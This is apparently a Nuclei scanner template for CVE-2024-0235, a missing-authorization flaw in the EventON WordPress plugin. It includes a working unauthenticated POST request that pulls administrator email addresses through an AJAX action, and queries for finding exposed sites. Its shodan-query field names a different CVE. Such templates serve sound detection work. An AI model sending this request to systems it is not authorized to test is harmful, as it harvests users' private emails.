id: CVE-2024-0235

info:
  name: EventON (Free < 2.2.8, Premium < 4.5.5) - Unauthenticated Email Address Disclosure
  author: princechaddha
  severity: medium
  description: |
    The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
  impact: |
    An attacker could potentially access sensitive email information.
  remediation: |
    Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235.
  reference:
    - https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-0235
    cwe-id: CWE-862
    epss-score: 0.00052
    epss-percentile: 0.19233
    cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
  metadata:
    vendor: myeventon
    product: eventon
    framework: wordpress
    shodan-query: vuln:CVE-2023-2796
    fofa-query: wp-content/plugins/eventon/
    publicwww-query: "wp-content/plugins/eventon/"
  tags: cve,cve2024,wp,wordpress,unauth,exposure,eventon,wpscan

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"

    headers:
      Content-Type: application/x-www-form-urlencoded

    body: "_user_role=administrator"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '@'
          - '"status":'
          - '"content":'
        condition: and

      - type: status
        status:
          - 200